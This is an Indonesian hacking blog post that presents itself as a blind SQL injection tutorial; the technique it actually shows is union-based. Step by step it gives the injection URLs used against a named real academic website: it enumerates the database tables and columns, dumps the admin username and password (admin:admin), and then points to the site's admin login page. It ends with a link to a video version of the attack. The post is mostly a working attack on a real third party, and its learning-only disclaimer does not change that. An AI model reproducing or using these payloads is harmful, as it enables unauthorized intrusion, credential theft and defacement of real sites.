Tutorial blind SQL injection memang sudah banyak di posting di blog maupun forum² underground, tapi ga ada salah nya jika gw posting juga di blog ini.
Untuk sample, kali ini gw ada target yatu http://www.stpp-manokwari.ac.id ( ini hanya untuk pembelajaran saja). Gw nemuin celah pada page http://www.stpp-manokwari.ac.id/view_ar.php?id=7 .
Untuk memastikan web tersebut ada bugs nya atau tidak, masukan tanda ' setelah angka 7
Seperti ini
http://www.stpp-manokwari.ac.id/view_ar.php?id=7 '
Artikel dalam halaman ini menjadi kosong, itu berarti ada bugs nya dan kita bisa meneruskan pencarian.
Langkah selanjutnya adalah menambahkan karakter - sebelum angka dan +union+select+1-- setelah angka.
http://www.stpp-manokwari.ac.id/view_ar.php?id=-7+union+select+1--
Tambahkan terus angka nya secara berurutan seperti 1,2,3,4-- dan seterus nya sampe keluar angka pada halaman web nya. Kebetulan angkanya keluar pada URL
http://www.stpp-manokwari.ac.id/view_ar.php?id=-7+union+select+1,2,3,4,5,6--
Dan yg muncul adalah angka 2.
Sekarang ganti angka 2 pada URL menjadi version() atau @@version
http://www.stpp-manokwari.ac.id/view_ar.php?id=-7+union+select+1,version(),3,4,5,6--
5.0.32-Debian_7etch8 ternyata versi 5 :D jadi kita ga perlu nebak2 seperti pada versi 4.
Kemudian ubah URL menjadi :
http://www.stpp-manokwari.ac.id/view_ar.php?id=-7+union+select+1,table_name,3,4,5,6
+from+information_schema.tables--
Ubah lagi menjadi :
http://www.stpp-manokwari.ac.id/view_ar.php?id=-7+union+select+1,group_concat(table_name),3,4,5,6
+from+information_schema.tables+where+table_schema=database()--
Table yg keluar yaitu :
agenda,artikel,galeria,intro,messages,news_head,pengumuman,polling,reporter,
stepspy,users
Langkah selanjutnya adalah mencari username & password admin dengan cara menconvert table yg keluar menjadi ASCII.
Ubah lagi URL nya menjadi :
http://www.stpp-manokwari.ac.id/view_ar.php?id=-7+union+select+1,group_concat(column_name),3,4,5,6
+from+information_schema.columns+where+table_name=0xASCII--
Upss...jangan di ENTER dulu...
Selanjutnya adalah mencari username & password dari table yg keluar tadi dengan menconvert nya pada ASCII converter. OK..kita coba convert table "users"
Hasil ASCII pada table users adalah 7573657273, lalu masukan pada URL tadi sehingga menjadi seperti ini :
http://www.stpp-manokwari.ac.id/view_ar.php?id=-7+union+select+1,group_concat(column_name),3,4,5,6
+from+information_schema.columns+where+table_name=0x7573657273--
Column yg keluar adalah :
user,passwd,level,headnews,galeri,artikel,agenda,polling,forum,pengumuman,admin,posted
Ganti tulisan group_concat(column_name) dengan column yg keluar tadi menjadi concat_ws(0x3a,user,passwd) dan ASCII nya di ganti menjadi users.
Hingga menjai seperti ini jadinya :
http://www.stpp-manokwari.ac.id/view_ar.php?id=-7+union+select+1,
concat_ws(0x3a,user,passwd),3,4,5,6+from+users--
ENTER !!!
Yupz...kita udah nemuin useername & password nya yaitu admin:admin
Username : admin
Password : admin
Selanjutnya adalah mencari halaman login admin, kebetulan halaman login adminnya ada pada
http://www.stpp-manokwari.ac.id/admin/
Note :
ini hanya untuk pengetahuan saja, gw ga menganjurkan untuk ngehack ataupun ngedeface web ini.
Tutorial versi video bisa di download pada link berikut
http://rapidshare.com/files/174433708/M364TR0N_BLIND_SQL_INJECTION.rar
Blind SQL Injection
Diposting oleh M364TR0N
Langganan:
Posting Komentar (Atom)
1 komentar:
wek, nimah bukan blind om,..!!
Posting Komentar